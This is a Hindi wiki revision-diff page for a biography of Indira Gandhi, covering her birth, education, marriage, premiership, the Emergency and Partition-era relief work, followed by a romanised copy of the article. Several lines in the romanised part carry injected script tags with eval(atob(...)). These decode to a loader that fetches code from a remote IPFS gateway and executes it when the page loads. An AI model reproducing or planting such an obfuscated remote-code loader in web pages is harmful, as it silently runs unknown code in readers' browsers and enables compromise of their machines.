Difference between revisions of "इंदिरा गाँधी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 43: Line 43:
 
==जीवन परिचय==
 
==जीवन परिचय==
 
{{main| इंदिरा गाँधी का जीवन परिचय}}
 
{{main| इंदिरा गाँधी का जीवन परिचय}}
इनका जन्म 19 नवम्बर, 1917 को [[इलाहाबाद]], [[उत्तर प्रदेश]] के [[आनंद भवन]] में एक सम्पन्न परिवार में हुआ था। इनका पूरा नाम है- 'इंदिरा प्रियदर्शनी गाँधी'। इनके पिता का नाम जवाहरलाल नेहरू और दादा का नाम मोतीलाल नेहरू था। पिता एवं दादा दोनों वकालत के पेशे से संबंधित थे और देश की स्वाधीनता में इनका प्रबल योगदान था। इनकी माता का नाम कमला नेहरू था जो दिल्ली के प्रतिष्ठित कौल परिवार की पुत्री थीं। '''इंदिराजी का जन्म ऐसे परिवार में हुआ था जो आर्थिक एवं बौद्धिक दोनों दृष्टि से काफ़ी संपन्न था।''' अत:  इन्हें आनंद भवन के रूप में महलनुमा आवास प्राप्त हुआ। इंदिरा जी का नाम इनके दादा पंडित मोतीलाल नेहरू ने रखा था। यह संस्कृतनिष्ठ शब्द है जिसका आशय है कांति, लक्ष्मी, एवं शोभा। इनके दादाजी को लगता था कि पौत्री के रूप में उन्हें मां लक्ष्मी और दुर्गा की प्राप्ति हुई है। पंडित नेहरू ने अत्यंत प्रिय देखने के कारण अपनी पुत्री को प्रियदर्शिनी के नाम से संबोधित किया जाता था। चूंकि जवाहरलाल नेहरू और कमला नेहरू स्वयं बेहद सुंदर तथा आकर्षक व्यक्तित्व के मालिक थे, इस कारण सुंदरता के मामले में यह गुणसूत्र उन्हें अपने माता-पिता से प्राप्त हुए थे। इन्हें एक घरेलू नाम भी मिला जो इंदिरा का संक्षिप्त रूप 'इंदु' था।
+
इनका जन्म 19 नवम्बर, 1917 को [[इलाहाबाद]], [[उत्तर प्रदेश]] के [[आनंद भवन]] में एक सम्पन्न परिवार में हुआ था। इनका पूरा नाम है- 'इंदिरा प्रियदर्शनी गाँधी'। इनके पिता का नाम जवाहरलाल नेहरू और दादा का नाम मोतीलाल नेहरू था। पिता एवं दादा दोनों वकालत के पेशे से संबंधित थे और देश की स्वाधीनता में इनका प्रबल योगदान था। इनकी माता का नाम कमला नेहरू था जो दिल्ली के प्रतिष्ठित कौल परिवार की पुत्री थीं। इंदिराजी का जन्म ऐसे परिवार में हुआ था जो आर्थिक एवं बौद्धिक दोनों दृष्टि से काफ़ी संपन्न था। अत:  इन्हें आनंद भवन के रूप में महलनुमा आवास प्राप्त हुआ। इंदिरा जी का नाम इनके दादा पंडित मोतीलाल नेहरू ने रखा था। यह संस्कृतनिष्ठ शब्द है जिसका आशय है कांति, लक्ष्मी, एवं शोभा। इनके दादाजी को लगता था कि पौत्री के रूप में उन्हें मां लक्ष्मी और दुर्गा की प्राप्ति हुई है। पंडित नेहरू ने अत्यंत प्रिय देखने के कारण अपनी पुत्री को प्रियदर्शिनी के नाम से संबोधित किया जाता था। चूंकि जवाहरलाल नेहरू और कमला नेहरू स्वयं बेहद सुंदर तथा आकर्षक व्यक्तित्व के मालिक थे, इस कारण सुंदरता के मामले में यह गुणसूत्र उन्हें अपने माता-पिता से प्राप्त हुए थे। इन्हें एक घरेलू नाम भी मिला जो इंदिरा का संक्षिप्त रूप 'इंदु' था।
 
==विद्यार्थी जीवन==
 
==विद्यार्थी जीवन==
 
{{main| इंदिरा गाँधी का विधार्थी जीवन}}
 
{{main| इंदिरा गाँधी का विधार्थी जीवन}}
Line 59: Line 59:
 
इंदिरा गँधी का विवाह 1942 में फिरोज़ गाँधी से हुआ। उनके दो पुत्र हुए- [[राजीव गाँधी]] और संजय गाँधी। राजीव गाँधी भी भारत के प्रधानमंत्री रहे हैं।
 
इंदिरा गँधी का विवाह 1942 में फिरोज़ गाँधी से हुआ। उनके दो पुत्र हुए- [[राजीव गाँधी]] और संजय गाँधी। राजीव गाँधी भी भारत के प्रधानमंत्री रहे हैं।
  
प्रेम की भावना का उदय इंदिरा के हृदय में भी हुआ था। पारसी युवक फ़ीरोज़ गाँधी से इंदिरा का परिचय उस समय से था जब वह [[आनंद भवन]] में एक स्वतंत्रता सेनानी की तरह आते था। फ़ीरोज़ गाँधी ने कमला नेहरू को माता मान दिया था। जर्मनी में जब कमला नेहरू को चिकित्सा के लिए ले जाया गया तब फ़िरोज मित्रता का फर्ज पूरा करने के लिए जर्मनी पहुँच गए था। [[लंदन]] से भारत वापसी का प्रबंध भी फ़िरोज ने एक सैनिक जहाज़ के माध्यम से किया था दोनों की मित्रता इस हद तक परवान चढ़ी कि विवाह करने का निश्चय कर लिया। ऐसा माना जाता है कि कमला नेहरू जीवित होतीं तो इस शादी को आसानी के साथ स्वीकृति मिल सकती थी। कमला जी अपने पति को शादी के लिए विवश कर सकती थीं। लेकिन कमला नेहरू उनकी मदद करने के लिए दुनिया में नहीं थीं। इंदिरा जी चाहती थीं कि उस शादी को पिता का आशीर्वाद अवश्य प्राप्त हो लेकिन पंडित नेहरू को उस शादी के लिए मना पाना असंभव नहीं तो कठिन अवश्य था। '''वैसे फ़ीरोज़ गाँधी को ही इंदिरा से शादी करने का प्रस्ताव पंडित नेहरू के सामने रखना चाहिए था लेकिन फ़िरोज यह हिम्मत नहीं कर पाए।''' उसने यह दायित्व इंदिरा को ही सौंप दिया। इंदिरा ने फ़ीरोज़ गाँधी को शादी का वचन दे दिया था।  
+
प्रेम की भावना का उदय इंदिरा के हृदय में भी हुआ था। पारसी युवक फ़ीरोज़ गाँधी से इंदिरा का परिचय उस समय से था जब वह [[आनंद भवन]] में एक स्वतंत्रता सेनानी की तरह आते था। फ़ीरोज़ गाँधी ने कमला नेहरू को माता मान दिया था। जर्मनी में जब कमला नेहरू को चिकित्सा के लिए ले जाया गया तब फ़िरोज मित्रता का फर्ज पूरा करने के लिए जर्मनी पहुँच गए था। [[लंदन]] से भारत वापसी का प्रबंध भी फ़िरोज ने एक सैनिक जहाज़ के माध्यम से किया था दोनों की मित्रता इस हद तक परवान चढ़ी कि विवाह करने का निश्चय कर लिया। ऐसा माना जाता है कि कमला नेहरू जीवित होतीं तो इस शादी को आसानी के साथ स्वीकृति मिल सकती थी। कमला जी अपने पति को शादी के लिए विवश कर सकती थीं। लेकिन कमला नेहरू उनकी मदद करने के लिए दुनिया में नहीं थीं। इंदिरा जी चाहती थीं कि उस शादी को पिता का आशीर्वाद अवश्य प्राप्त हो लेकिन पंडित नेहरू को उस शादी के लिए मना पाना असंभव नहीं तो कठिन अवश्य था। वैसे फ़ीरोज़ गाँधी को ही इंदिरा से शादी करने का प्रस्ताव पंडित नेहरू के सामने रखना चाहिए था लेकिन फ़िरोज यह हिम्मत नहीं कर पाए। उसने यह दायित्व इंदिरा को ही सौंप दिया। इंदिरा ने फ़ीरोज़ गाँधी को शादी का वचन दे दिया था।  
  
 
==राजनीति==
 
==राजनीति==
Line 70: Line 70:
 
==देश का विकास==
 
==देश का विकास==
 
{{main|इंदिरा गाँधी और देश का विकास}}
 
{{main|इंदिरा गाँधी और देश का विकास}}
पाकिस्तान से युद्ध के बाद इंदिरा गाँधी ने अपना सारा ध्यान देश के विकास की ओर केंद्रित कर दिया। संसद में उन्हें बहुमत प्राप्त था और निर्णय लेने में स्वतंत्रता थी। उन्होंने ऐसे उद्योगों को रेखांकित किया जिनका कुशल उपयोग नहीं हो रहा था। उनमें से एक बीमा उद्योग था और दूसरा कोयला उद्योग। बीमा कंपनियाँ भारी मुनाफा अर्जित कर रही थीं। लेकिन उनकी पूँजी से देश का विकास नहीं हो रहा था। वह पूँजी निजी हाथों में जा रही थी। बीमा कंपनियों के नियमों में पारदर्शिता का अभाव होने के कारण जनता को वैसे लाभ नहीं प्राप्त हो रहे थे, जैसे होने चाहिए थे। '''लिहाज़ा [[अगस्त]], [[1972]] में बीमा कारोबार का राष्ट्रीयकरण कर दिया गया।'''
+
पाकिस्तान से युद्ध के बाद इंदिरा गाँधी ने अपना सारा ध्यान देश के विकास की ओर केंद्रित कर दिया। संसद में उन्हें बहुमत प्राप्त था और निर्णय लेने में स्वतंत्रता थी। उन्होंने ऐसे उद्योगों को रेखांकित किया जिनका कुशल उपयोग नहीं हो रहा था। उनमें से एक बीमा उद्योग था और दूसरा कोयला उद्योग। बीमा कंपनियाँ भारी मुनाफा अर्जित कर रही थीं। लेकिन उनकी पूँजी से देश का विकास नहीं हो रहा था। वह पूँजी निजी हाथों में जा रही थी। बीमा कंपनियों के नियमों में पारदर्शिता का अभाव होने के कारण जनता को वैसे लाभ नहीं प्राप्त हो रहे थे, जैसे होने चाहिए थे। लिहाज़ा [[अगस्त]], [[1972]] में बीमा कारोबार का राष्ट्रीयकरण कर दिया गया।
  
 
==आपातकाल==
 
==आपातकाल==
 
{{main|इंदिरा गाँधी और आपातकाल}}
 
{{main|इंदिरा गाँधी और आपातकाल}}
 
[[15 जून]], [[1975]] को जे.पी. और समर्थिक विपक्ष ने आंदोलन को उग्र रूप दे दिया। साथ ही यह तय किया गया कि पूरे देश में [[सविनय अवज्ञा आन्दोलन]] चलाया जाए और प्रधानमंत्री आवास को भी घेर लिया जाए। आवास में मौजूद लोगों को नज़रबंद करके किसी को भी अंदर प्रविष्ट न होने दिया जाए।  
 
[[15 जून]], [[1975]] को जे.पी. और समर्थिक विपक्ष ने आंदोलन को उग्र रूप दे दिया। साथ ही यह तय किया गया कि पूरे देश में [[सविनय अवज्ञा आन्दोलन]] चलाया जाए और प्रधानमंत्री आवास को भी घेर लिया जाए। आवास में मौजूद लोगों को नज़रबंद करके किसी को भी अंदर प्रविष्ट न होने दिया जाए।  
इन्हीं परिस्थितियों के कारण प्रधानमंत्री इंदिरा गाँधी ने [[25 जून]], 1975 को तत्कालीन राष्ट्रपति [[फ़ख़रुद्दीन अली अहमद]] से आपातकाल लागू करने की हस्ताक्षरित स्वीकृति प्राप्त कर ली। '''इस प्रकार [[26 जून]], 1975 की प्रातः देश में आपातकाल की घोषणा कर दी गई।''' आपातकाल लागू होने के बाद जयप्रकाश नारायण, मोरारजी देसाई और अन्य सैकड़ों छोटे-बड़े नेताओं को गिरफ़्तार करके जेल में डाल दिया गया। ऐसा माना जाता है कि आपातकाल के दौरान एक लाख व्यक्तियों को देश की विभिन्न जेलों में बंद किया गया था। इनमें मात्र राजनीतिक व्यक्ति ही नहीं, आपराधिक प्रवृत्ति के लोग भी थे जो ऐसे आंदोलनों के समय लूटपाट करते हैं। साथ ही भ्रष्ट कालाबाज़ारियों और हिस्ट्रीशीटर अपराधियों को बंद कर दिया गया।
+
इन्हीं परिस्थितियों के कारण प्रधानमंत्री इंदिरा गाँधी ने [[25 जून]], 1975 को तत्कालीन राष्ट्रपति [[फ़ख़रुद्दीन अली अहमद]] से आपातकाल लागू करने की हस्ताक्षरित स्वीकृति प्राप्त कर ली। इस प्रकार [[26 जून]], 1975 की प्रातः देश में आपातकाल की घोषणा कर दी गई। आपातकाल लागू होने के बाद जयप्रकाश नारायण, मोरारजी देसाई और अन्य सैकड़ों छोटे-बड़े नेताओं को गिरफ़्तार करके जेल में डाल दिया गया। ऐसा माना जाता है कि आपातकाल के दौरान एक लाख व्यक्तियों को देश की विभिन्न जेलों में बंद किया गया था। इनमें मात्र राजनीतिक व्यक्ति ही नहीं, आपराधिक प्रवृत्ति के लोग भी थे जो ऐसे आंदोलनों के समय लूटपाट करते हैं। साथ ही भ्रष्ट कालाबाज़ारियों और हिस्ट्रीशीटर अपराधियों को बंद कर दिया गया।
 
==देश का विभाजन==
 
==देश का विभाजन==
 
[[चित्र:Indira-Gandhi-2.jpg|thumb|250px|left|इंदिरा गाँधी स्टाम्प]]
 
[[चित्र:Indira-Gandhi-2.jpg|thumb|250px|left|इंदिरा गाँधी स्टाम्प]]
उस समय देश विभाजन के किनारे पर था। [[मुहम्मद अली जिन्ना|जिन्ना]] के नेतृत्व में मुस्लिम लीग ने पाकिस्तान की माँग की थी और अंग्रेज़ भी जिन्ना की माँग को स्पष्ट हवा दे रहे थे लेकिन गाँधीजी विभाजन के पक्ष में नहीं थे। लॉर्ड माउंटबेटन कूटनीति का खेल खेलने में लगे हुए थे। वह एक ओर महात्मा गाँधी को आश्वस्त कर रहे थे कि देश का विभाजन नहीं होगा तो दूसरी ओर पंडित नेहरू से कह रहे थे कि दो राष्ट्रों के विभाजन के फॉर्मूले पर ही आज़ादी प्रदान की जाएगी। '''पंडित नेहरू स्थिति की गंभीरता को समझ रहे थे जबकि महात्मा गाँधी इस भ्रम में थे कि अंग्रेज़ वायसराय विभाजन नहीं चाहता है।''' जिन्ना की अनुचित माँग के कारण हिन्दू और मुसलमानों में वैमनस्य पसर गया था। महत्त्वाकांक्षी जिन्ना पाकिस्तान का प्रधानमंत्री बनने के लिए बहुत लालायित थे। महात्मा गाँधी ने जिन्ना को संपूर्ण और अखंड भारत का प्रधानमंत्री बनाने का आश्वासन दिया। लेकिन जिन्ना यह जानते थे कि पंडित नेहरू के कारण यह संभव नहीं है। हिन्दू किसी भी मुस्लिम को प्रधानमंत्री के रूप में स्वीकार नहीं करेंगे। '''ऐसे में देश सांप्रदायिक दंगों की आग में झुलसने लगा था।''' महात्मा गाँधी किसी तरह दंगों की आग शांत करना चाहते थे। दिल्ली में भी कई स्थानों पर इंसानियत शर्मसार हो रही थी। तब महात्मा गाँधी ने इंदिरा जी को यह मुहिम सौंपी कि वह दंगाग्रस्त क्षेत्रों में जाकर लोगों को समझाएँ और अमन लौटाने में मदद करें।  
+
उस समय देश विभाजन के किनारे पर था। [[मुहम्मद अली जिन्ना|जिन्ना]] के नेतृत्व में मुस्लिम लीग ने पाकिस्तान की माँग की थी और अंग्रेज़ भी जिन्ना की माँग को स्पष्ट हवा दे रहे थे लेकिन गाँधीजी विभाजन के पक्ष में नहीं थे। लॉर्ड माउंटबेटन कूटनीति का खेल खेलने में लगे हुए थे। वह एक ओर महात्मा गाँधी को आश्वस्त कर रहे थे कि देश का विभाजन नहीं होगा तो दूसरी ओर पंडित नेहरू से कह रहे थे कि दो राष्ट्रों के विभाजन के फॉर्मूले पर ही आज़ादी प्रदान की जाएगी। पंडित नेहरू स्थिति की गंभीरता को समझ रहे थे जबकि महात्मा गाँधी इस भ्रम में थे कि अंग्रेज़ वायसराय विभाजन नहीं चाहता है। जिन्ना की अनुचित माँग के कारण हिन्दू और मुसलमानों में वैमनस्य पसर गया था। महत्त्वाकांक्षी जिन्ना पाकिस्तान का प्रधानमंत्री बनने के लिए बहुत लालायित थे। महात्मा गाँधी ने जिन्ना को संपूर्ण और अखंड भारत का प्रधानमंत्री बनाने का आश्वासन दिया। लेकिन जिन्ना यह जानते थे कि पंडित नेहरू के कारण यह संभव नहीं है। हिन्दू किसी भी मुस्लिम को प्रधानमंत्री के रूप में स्वीकार नहीं करेंगे। ऐसे में देश सांप्रदायिक दंगों की आग में झुलसने लगा था। महात्मा गाँधी किसी तरह दंगों की आग शांत करना चाहते थे। दिल्ली में भी कई स्थानों पर इंसानियत शर्मसार हो रही थी। तब महात्मा गाँधी ने इंदिरा जी को यह मुहिम सौंपी कि वह दंगाग्रस्त क्षेत्रों में जाकर लोगों को समझाएँ और अमन लौटाने में मदद करें।  
 
====दंगाग्रस्त क्षेत्रों का दौरा====
 
====दंगाग्रस्त क्षेत्रों का दौरा====
इंदिरा गाँधी ने फिर महात्मा गाँधी के आदेश को शिरोधार्य किया और दंगाग्रस्त क्षेत्रों में दोनों समुदायों के लोगों को समझाने का प्रयास करने लगीं। वस्तुतः यह अत्यंत जोखिम कार्य था। पंडित नेहरू की बेटी होने के कारण अतिवादी उन्हें नुक़सान पहुँचा सकते थे परंतु निर्भिक इंदिरा ने दंगों की आग शांत करने के लिए पुरज़ोर प्रयास किए। लेकिन 15 अगस्त के बाद सांप्रदायिकता अपने चरम पर पहुँच गई। दंगों में दोनों समुदायों के अनगिनत लोग मौत के घाट उतार दिए गए। [[पाकिस्तान]] से लाखों  शरणार्थी दिल्ली आ गए थे। शरणार्थियों के पुनर्वास का सवाल भी उत्पन्न हो गया था। उन भूखे-प्यासे घर से भागे लोगों के लिए प्राथमिक आवश्यकताएँ भी जरूरी थीं। ऐसी स्थिति में दिल्ली के कई स्थानों पर शरणार्थी एवं दंगा पीड़ित शिविर लगाए गए थे। '''पंडित नेहरू ने 17, पार्क रोड के अपने बंगले पर भी शरणार्थी शिविर लगाए।''' शरणार्थियों के जीवन की बुनियादी सुविधाओं का ध्यान रखा जा रहा था। उस समय महात्मा गाँधी पश्चिम बंगाल के नोआख़ाली ज़िले में जहाँ मुस्लिमों की कई बस्तियों को जला दिया गया था। पाकिस्तान से आने वाली ट्रेनों में हज़ारों हिन्दुओं की लाशें भी आ रही थीं। इस कारण हिन्दू आक्रोशित होकर मुसलमानों पर हमला कर रहे थे।  
+
इंदिरा गाँधी ने फिर महात्मा गाँधी के आदेश को शिरोधार्य किया और दंगाग्रस्त क्षेत्रों में दोनों समुदायों के लोगों को समझाने का प्रयास करने लगीं। वस्तुतः यह अत्यंत जोखिम कार्य था। पंडित नेहरू की बेटी होने के कारण अतिवादी उन्हें नुक़सान पहुँचा सकते थे परंतु निर्भिक इंदिरा ने दंगों की आग शांत करने के लिए पुरज़ोर प्रयास किए। लेकिन 15 अगस्त के बाद सांप्रदायिकता अपने चरम पर पहुँच गई। दंगों में दोनों समुदायों के अनगिनत लोग मौत के घाट उतार दिए गए। [[पाकिस्तान]] से लाखों  शरणार्थी दिल्ली आ गए थे। शरणार्थियों के पुनर्वास का सवाल भी उत्पन्न हो गया था। उन भूखे-प्यासे घर से भागे लोगों के लिए प्राथमिक आवश्यकताएँ भी जरूरी थीं। ऐसी स्थिति में दिल्ली के कई स्थानों पर शरणार्थी एवं दंगा पीड़ित शिविर लगाए गए थे। पंडित नेहरू ने 17, पार्क रोड के अपने बंगले पर भी शरणार्थी शिविर लगाए। शरणार्थियों के जीवन की बुनियादी सुविधाओं का ध्यान रखा जा रहा था। उस समय महात्मा गाँधी पश्चिम बंगाल के नोआख़ाली ज़िले में जहाँ मुस्लिमों की कई बस्तियों को जला दिया गया था। पाकिस्तान से आने वाली ट्रेनों में हज़ारों हिन्दुओं की लाशें भी आ रही थीं। इस कारण हिन्दू आक्रोशित होकर मुसलमानों पर हमला कर रहे थे।  
 
====घर में शरणार्थी शिविर====
 
====घर में शरणार्थी शिविर====
 
पंडित जवाहरलाल नेहरू के बंगले में जो शरणार्थी शिविर लगाए गए थे, उनकी देखरेख इंदिरा गाँधी ही कर रही थीं। सभी कमरे ख़ाली करके शरणार्थियों को उनमें ठहरा दिया गया था और प्रांगण आदि में भी तम्बू इत्यादि लगा दिए थे ताकि अधिकाधिक शरणार्थियों को वहाँ रखा जा सके। यहाँ की सभी व्यवस्था इंदिरा गाँधी द्वारा देखी जा रही थी। अंतरिम सरकार के गठन के साथ पंडित नेहरू [[कार्यवाहक प्रधानमंत्री]] बना दिए थे। [[26 जनवरी]], [[1950]] को भारत का संविधान भी लागू हो गया। भारत एक गणतांत्रिक देश बना और प्रधानमंत्री नेहरू की सक्रियता काफ़ी अधिक बढ़ गई। इस समय नेहरूजी का निवास त्रिमूर्ति भवन ही था। समय-समय पर विभिन्न देशों के आगंतुक त्रिमूर्ति भवन में ही नेहरूजी के पास आते थे। उनके स्वागत के सभी इंतज़ाम इंदिरा गाँधी द्वारा किए जाते थे। साथ ही साथ उम्रदराज़़ हो रहे पिता की आवश्यकताओं को भी इंदिरा देखती थीं।
 
पंडित जवाहरलाल नेहरू के बंगले में जो शरणार्थी शिविर लगाए गए थे, उनकी देखरेख इंदिरा गाँधी ही कर रही थीं। सभी कमरे ख़ाली करके शरणार्थियों को उनमें ठहरा दिया गया था और प्रांगण आदि में भी तम्बू इत्यादि लगा दिए थे ताकि अधिकाधिक शरणार्थियों को वहाँ रखा जा सके। यहाँ की सभी व्यवस्था इंदिरा गाँधी द्वारा देखी जा रही थी। अंतरिम सरकार के गठन के साथ पंडित नेहरू [[कार्यवाहक प्रधानमंत्री]] बना दिए थे। [[26 जनवरी]], [[1950]] को भारत का संविधान भी लागू हो गया। भारत एक गणतांत्रिक देश बना और प्रधानमंत्री नेहरू की सक्रियता काफ़ी अधिक बढ़ गई। इस समय नेहरूजी का निवास त्रिमूर्ति भवन ही था। समय-समय पर विभिन्न देशों के आगंतुक त्रिमूर्ति भवन में ही नेहरूजी के पास आते थे। उनके स्वागत के सभी इंतज़ाम इंदिरा गाँधी द्वारा किए जाते थे। साथ ही साथ उम्रदराज़़ हो रहे पिता की आवश्यकताओं को भी इंदिरा देखती थीं।
Line 91: Line 91:
  
 
==उपसंहार==  
 
==उपसंहार==  
[[भारत]] के जितने भी प्रधानमंत्री हुए हैं, उन सभी की अनेक विशेषताएँ हो सकती हैं, लेकिन इंदिरा गाँधी के रूप में जो प्रधानमंत्री भारत भूमि को प्राप्त हुआ, वैसा प्रधानमंत्री अभी तक दूसरा नहीं हुआ है क्योंकि एक प्रधानमंत्री के रूप में उन्होंने विभिन्न चुनौतियों का मुक़ाबला करने में सफलता प्राप्त की। युद्ध हो, विपक्ष की ग़लतियाँ हों, कूटनीति का अंतर्राष्ट्रीय मैदान हो अथवा देश की कोई समस्या हो- इंदिरा गाँधी ने अक्सर स्वयं को सफल साबित किया। इंदिरा गाँधी, नेहरू के द्वारा शुरू की गई औद्योगिक विकास की अर्द्ध समाजवादी नीतियों पर क़ायम रहीं। उन्होंने सोवियत संघ के साथ नज़दीकी सम्बन्ध क़ायम किए और पाकिस्तान-भारत विवाद के दौरान समर्थन के लिए उसी पर आश्रित रहीं। '''जिन्होंने इंदिरा गाँधी के प्रधानमंत्रित्व काल को देखा है, वे लोग यह मानते हैं कि इंदिरा गाँधी में अपार साहस, निर्णय शक्ति और धैर्य था।'''
+
[[भारत]] के जितने भी प्रधानमंत्री हुए हैं, उन सभी की अनेक विशेषताएँ हो सकती हैं, लेकिन इंदिरा गाँधी के रूप में जो प्रधानमंत्री भारत भूमि को प्राप्त हुआ, वैसा प्रधानमंत्री अभी तक दूसरा नहीं हुआ है क्योंकि एक प्रधानमंत्री के रूप में उन्होंने विभिन्न चुनौतियों का मुक़ाबला करने में सफलता प्राप्त की। युद्ध हो, विपक्ष की ग़लतियाँ हों, कूटनीति का अंतर्राष्ट्रीय मैदान हो अथवा देश की कोई समस्या हो- इंदिरा गाँधी ने अक्सर स्वयं को सफल साबित किया। इंदिरा गाँधी, नेहरू के द्वारा शुरू की गई औद्योगिक विकास की अर्द्ध समाजवादी नीतियों पर क़ायम रहीं। उन्होंने सोवियत संघ के साथ नज़दीकी सम्बन्ध क़ायम किए और पाकिस्तान-भारत विवाद के दौरान समर्थन के लिए उसी पर आश्रित रहीं। जिन्होंने इंदिरा गाँधी के प्रधानमंत्रित्व काल को देखा है, वे लोग यह मानते हैं कि इंदिरा गाँधी में अपार साहस, निर्णय शक्ति और धैर्य था।
  
 
==उपलब्धियाँ==
 
==उपलब्धियाँ==

Revision as of 05:36, 30 October 2015

iandira gaandhi
poora nam iandira priyadarshani gaandhi
any nam indu
janm 19 navambar, 1917
janm bhoomi ilahabad, uttar pradesh
mrityu 31 aktoobar, 1984
mrityu sthan dilli
mrityu karan hatya
abhibhavak javaharalal neharoo, kamala neharoo
pati/patni firoz gaandhi
santan rajiv gaandhi aur sanjay gaandhi
smarak shakti sthal, dilli
prasiddhi 1971 ke bharat -pakistan yuddh mean bharat ki vijay
parti kaangres
pad bharat ki tritiy pradhanamantri
kary kal 19 janavari, 1966 se 24 march, 1977, 14 janavari, 1980 se 31 aktoobar, 1984
vidyalay vishvabharati vishvavidyalay bangal, ianglaiand ki aauksaford yoonivarsiti, shaanti niketan
bhasha hindi, aangrezi
jel yatra aktoobar, 1977 aur disambar, 1978
puraskar-upadhi bharat ratn samman
vishesh yogadan baianko ka rashtriyakaran
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
iandira gaandhi vishay soochi

iandira priyadarshani gaandhi (janm- 19 navambar, 1917 ilahabad - mrityu- 31 aktoobar, 1984 dilli) n keval bharatiy rajaniti par chhaee rahian balki vishv rajaniti ke kshitij par bhi ve ek prabhav chho d geean. shrimati iandira gaandhi ka janm neharoo khanadan mean hua tha. iandira gaandhi, bharat ke pratham pradhanamantri pandit javaharalal neharoo ki ikalauti putri thian. aj iandira gaandhi ko sirf is karan nahian jana jata ki vah pandit javaharalal neharoo ki beti thian balki iandira gaandhi apani pratibha aur rajanitik dridhata ke lie 'vishvarajaniti' ke itihas mean jani jati haian aur iandira gaandhi ko 'lauh-mahila' ke nam se sanbodhit kiya jata hai. ye bharat ki pratham mahila pradhanamantri thian.

jivan parichay

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

inaka janm 19 navambar, 1917 ko ilahabad, uttar pradesh ke anand bhavan mean ek sampann parivar mean hua tha. inaka poora nam hai- 'iandira priyadarshani gaandhi'. inake pita ka nam javaharalal neharoo aur dada ka nam motilal neharoo tha. pita evan dada donoan vakalat ke peshe se sanbandhit the aur desh ki svadhinata mean inaka prabal yogadan tha. inaki mata ka nam kamala neharoo tha jo dilli ke pratishthit kaul parivar ki putri thian. iandiraji ka janm aise parivar mean hua tha jo arthik evan bauddhik donoan drishti se kafi sanpann tha. at: inhean anand bhavan ke roop mean mahalanuma avas prapt hua. iandira ji ka nam inake dada pandit motilal neharoo ne rakha tha. yah sanskritanishth shabd hai jisaka ashay hai kaanti, lakshmi, evan shobha. inake dadaji ko lagata tha ki pautri ke roop mean unhean maan lakshmi aur durga ki prapti huee hai. pandit neharoo ne atyant priy dekhane ke karan apani putri ko priyadarshini ke nam se sanbodhit kiya jata tha. chooanki javaharalal neharoo aur kamala neharoo svayan behad suandar tatha akarshak vyaktitv ke malik the, is karan suandarata ke mamale mean yah gunasootr unhean apane mata-pita se prapt hue the. inhean ek ghareloo nam bhi mila jo iandira ka sankshipt roop 'iandu' tha.

vidyarthi jivan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

iandira ji ko janm ke kuchh varshoan bad bhi shiksha ka anukool mahaul nahian upalabdh ho paya tha. paanch varsh ki avastha ho jane tak balika iandira ne vidyalay ka mukh nahian dekha tha. pita javaharalal neharoo desh ki azadi ke aandolan mean vyast the aur mata kamala neharoo us samay bimar rahati thian. ghar ka vatavaran bhi padhaee ke anukool nahian tha. kaangres ke karyakartaoan ka rat-din anand bhavan mean ana jana laga rahata tha. tathapi pandit neharoo ne putri ki shiksha ke lie ghar par hi shikshakoan ka iantazam kar diya tha. balika iandu ko anand bhavan mean hi shikshakoan dvara padhaya jata tha.

pradhanamantritv kal

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

iandira gaandhi lagatar tin bar (1966-1977) aur phir chauthi bar (1980-84) bharat ki pradhanamantri bani.

  • bharat ke dvitiy pradhanamantri shri lalabahadur shastri ki mrityu ke bad shrimati iandira gaandhi bharat ki tritiy aur pratham mahila pradhanamantri nirvachit huee.
  • 1967 ke chunav mean vah bahut hi kam bahumat se jit sakian.
  • 1971 mean punah bhari bahumat se ve pradhamantri bani aur 1977 tak rahian.
  • 1977 ke bad ye 1980 mean ek bar phir pradhanamantri banian aur 1984 tak pradhanamantri ke pad par rahian.

dampaty jivan

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

iandira gandhi ka vivah 1942 mean phiroz gaandhi se hua. unake do putr hue- rajiv gaandhi aur sanjay gaandhi. rajiv gaandhi bhi bharat ke pradhanamantri rahe haian.

